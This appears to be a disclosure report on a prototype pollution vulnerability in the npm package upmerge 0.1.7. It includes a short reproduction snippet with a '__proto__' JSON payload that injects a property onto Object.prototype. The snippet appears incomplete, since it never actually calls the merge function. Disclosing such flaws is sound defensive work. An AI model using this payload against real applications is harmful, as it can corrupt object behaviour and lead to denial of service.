Prototype pollution attack (upmerge)
Discovered by dienpv on Nodejs-ecosystem

This issue took 4 Days and 21 hours to triage and 79 Days and 19 hours to resolve once triaged.

Hi team, I would like to report a prototype pollution vulnerability in upmerge that allows an attacker to inject properties on Object.prototype.


module name: upmerge version: 0.1.7 npm page:

Module Description

> JavaScript Object Merge and Clone for Client or Server side


Vulnerability Description

> this vulnerability type is similar to my report #438274 upmerge is vulnerable to prototype pollution when it merges objects.

Steps To Reproduce:

> In the following code snippet, "payload" would come from user-input (JSON data).

var upmerge = require('upmerge');
var payload = '{"__proto__":{"polluted":"upmerge_done !"}}';
var test = {};
console.log("Before: ", test.polluted);
console.log("After: ", test.polluted);

# Wrap up

- I contacted the maintainer to let them know: N
- I opened an issue in the related repository: N


## Impact

It causes Denial of Service or RCE in some cases.